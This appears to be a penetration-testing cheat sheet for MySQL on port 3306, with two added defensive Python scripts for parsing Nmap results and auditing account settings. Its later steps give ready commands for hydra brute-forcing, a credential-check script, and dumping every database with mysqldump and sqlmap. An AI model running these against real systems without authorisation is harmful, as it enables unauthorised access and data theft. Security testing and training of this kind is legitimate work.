MYSQL 3306

MySQL Enumeration and Scanning (Port 3306)

Step 1: Define the Target IP

Replace <target_ip> in the commands below with the target's IP address, or reference it as $TARGET_IP after exporting it as shown.

# Define the target IP
export TARGET_IP="192.168.1.100"

Step 2: Perform an Nmap Scan for MySQL Services

Basic Scan

nmap -p 3306 -sV --script "mysql-*" <target_ip>

Explanation:

  • -p 3306: Specifies the MySQL port.

  • -sV: Detects the service version.

  • --script "mysql-*": Runs every Nmap NSE script whose name starts with mysql- (quoted so the shell does not expand the wildcard).

Common Nmap Scripts for MySQL

  • mysql-info: Gathers MySQL server information.

  • mysql-users: Enumerates MySQL users (requires valid credentials).

  • mysql-databases: Enumerates databases (if credentials are provided).

  • mysql-empty-password: Checks for accounts with empty passwords.

Example:

nmap -p 3306 --script mysql-info,mysql-users,mysql-empty-password <target_ip>
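Once a scan has been saved with -oX, its results can be processed rather than read by eye. The script below is an added example, not part of this cheat sheet or of Nmap: it parses nmap's XML report with the standard library, lists every host on which a MySQL service was reported together with its state and version, and keeps each NSE script's result. The XML embedded in it is constructed sample input in nmap's output format (the mysql-info keys such as "Auth Plugin Name" are assumed from how NSE renders table output as <elem> children), not output from a real scan.

```python
# Added example: inventory MySQL findings from an nmap XML report (nmap ... -oX scan.xml).
import xml.etree.ElementTree as ET

# Constructed sample report in nmap's XML format; not a real scan result.
SAMPLE_NMAP_XML = """
<nmaprun scanner="nmap">
  <host>
    <address addr="192.168.1.100" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="3306">
        <state state="open" reason="syn-ack"/>
        <service name="mysql" product="MySQL" version="5.7.30" method="probed" conf="10"/>
        <script id="mysql-info" output="Protocol: 10, Version: 5.7.30">
          <elem key="Protocol">10</elem>
          <elem key="Version">5.7.30</elem>
          <elem key="Auth Plugin Name">mysql_native_password</elem>
        </script>
        <script id="mysql-empty-password" output="root account has empty password"/>
      </port>
    </ports>
  </host>
  <host>
    <address addr="192.168.1.101" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="3306">
        <state state="filtered" reason="no-response"/>
        <service name="mysql"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_mysql_findings(xml_text):
    """Return one dict per host/port where nmap reported a MySQL service."""
    results = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            service = port.find("service")
            if service is None or service.get("name") != "mysql":
                continue
            state = port.find("state")
            entry = {
                "host": addr,
                "port": int(port.get("portid")),
                "state": state.get("state") if state is not None else "unknown",
                "product": service.get("product", ""),
                "version": service.get("version", ""),
                "scripts": {},
            }
            for script in port.findall("script"):
                # NSE table results appear as <elem key="...">value</elem> children;
                # when a script only produced flat text, keep its output attribute instead
                elems = {e.get("key"): (e.text or "").strip() for e in script.findall("elem")}
                entry["scripts"][script.get("id")] = elems or (script.get("output") or "").strip()
            results.append(entry)
    return results


def exposed_mysql_hosts(xml_text):
    """Addresses whose MySQL port is actually open, i.e. reachable from the scanner."""
    return [r["host"] for r in parse_mysql_findings(xml_text) if r["state"] == "open"]


if __name__ == "__main__":
    for entry in parse_mysql_findings(SAMPLE_NMAP_XML):
        print(f"{entry['host']}:{entry['port']} {entry['state']} {entry['product']} {entry['version']}")
        for script_id, result in entry["scripts"].items():
            print(f"  {script_id}: {result}")
```

Filtered or closed ports are kept in the inventory on purpose so that a host which answers on 3306 only from some networks still shows up; exposed_mysql_hosts() narrows that to ports that were actually open.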

Step 3: Enumerate MySQL Using Metasploit

  1. Launch Metasploit:

    msfconsole
  2. Use the MySQL login auxiliary module:

    use auxiliary/scanner/mysql/mysql_login
    set RHOSTS <target_ip>
    set USERNAME root
    set PASSWORD <password>
    run
  3. Use the MySQL enumeration module:

    use auxiliary/admin/mysql/mysql_enum
    set RHOSTS <target_ip>
    set USERNAME <username>
    set PASSWORD <password>
    run

Step 4: Connect to MySQL Manually

  1. Install the MySQL client (if not already installed):

    sudo apt install mysql-client
  2. Connect to the MySQL server:

    mysql -h <target_ip> -u <username> -p

    Replace <username> with the username and enter the password when prompted.

  3. Run SQL queries to enumerate databases, tables, and users:

    SHOW DATABASES;
    USE <database_name>;
    SHOW TABLES;
    SELECT User, Host FROM mysql.user;
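The mysql.user query above is the one most worth reviewing carefully. The script below is an added example, not from the original cheat sheet, that audits such rows for weak account settings: an empty authentication string (except for socket-authenticated accounts, which legitimately have none), anonymous users, accounts reachable from any host, root permitted to log in remotely, and the legacy mysql_old_password plugin. The rows embedded in it are constructed sample data in the shape of SELECT User, Host, plugin, authentication_string FROM mysql.user, and the hash strings in them are placeholders.

```python
# Added example: audit rows from mysql.user for weak account settings.
# SAMPLE_ROWS is constructed sample data in the shape returned by
#   SELECT User, Host, plugin, authentication_string FROM mysql.user;
# The hash strings are placeholders, not real password hashes.
SAMPLE_ROWS = [
    ("root",   "localhost", "auth_socket",           ""),
    ("root",   "%",         "mysql_native_password", ""),
    ("app",    "10.0.0.%",  "mysql_native_password", "*PLACEHOLDER_NATIVE_HASH_0001"),
    ("backup", "%",         "caching_sha2_password", "$A$005$PLACEHOLDER_SHA2_HASH"),
    ("legacy", "localhost", "mysql_old_password",    "PLACEHOLDER_OLD_HASH"),
    ("",       "localhost", "mysql_native_password", ""),
]

# Plugins that authenticate through the OS socket and therefore carry no password string
SOCKET_PLUGINS = {"auth_socket", "unix_socket"}


def audit_account(user, host, plugin, auth_string):
    """Return the list of findings for one mysql.user row; an empty list means no finding."""
    findings = []
    if auth_string == "" and plugin not in SOCKET_PLUGINS:
        findings.append("empty password")
    if user == "":
        findings.append("anonymous account")
    if host == "%":
        findings.append("reachable from any host")
    if user == "root" and host != "localhost":
        findings.append("remote root login")
    if plugin == "mysql_old_password":
        findings.append("legacy pre-4.1 password hashing")
    return findings


def audit_rows(rows):
    """Map (user, host) -> findings for every row that has at least one finding."""
    report = {}
    for user, host, plugin, auth_string in rows:
        findings = audit_account(user, host, plugin, auth_string)
        if findings:
            report[(user, host)] = findings
    return report


if __name__ == "__main__":
    for (user, host), findings in audit_rows(SAMPLE_ROWS).items():
        print(f"'{user}'@'{host}': {', '.join(findings)}")
```

The auth_socket exception matters in practice: on distributions that ship root with socket authentication, the empty authentication_string is expected, and flagging it would be a false positive.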

Step 5: Exploit Weak Credentials

  1. Use a brute-force tool like hydra:

    hydra -L usernames.txt -P passwords.txt -t 4 -f <target_ip> mysql
  2. Use a Python script for credential checking:

    import pymysql

    target_ip = "<target_ip>"  # replace with the target IP
    username = "root"
    password = "password"

    try:
        # A successful connect means the credentials were accepted
        conn = pymysql.connect(host=target_ip, user=username, password=password, connect_timeout=5)
        print("[+] Successful login")
        conn.close()
    except pymysql.MySQLError as e:
        # Catch only MySQL/connection errors so unrelated bugs are not silently hidden
        print(f"[-] Failed login: {e}")

Step 6: Dump Data Using Tools

mysqldump

  1. If credentials are available, dump data using mysqldump:

    mysqldump -h <target_ip> -u <username> -p --all-databases > dump.sql

sqlmap

  1. Run sqlmap for automated database exploitation:

    sqlmap -r request.txt --dbms=mysql --dump

Notes

  • The default MySQL root account may have no password set.

  • Look for sensitive data in dumped databases.

  • Always document credentials and configurations during enumeration.

  • Ensure tools like sqlmap, hydra, and nmap are installed for effective scanning.
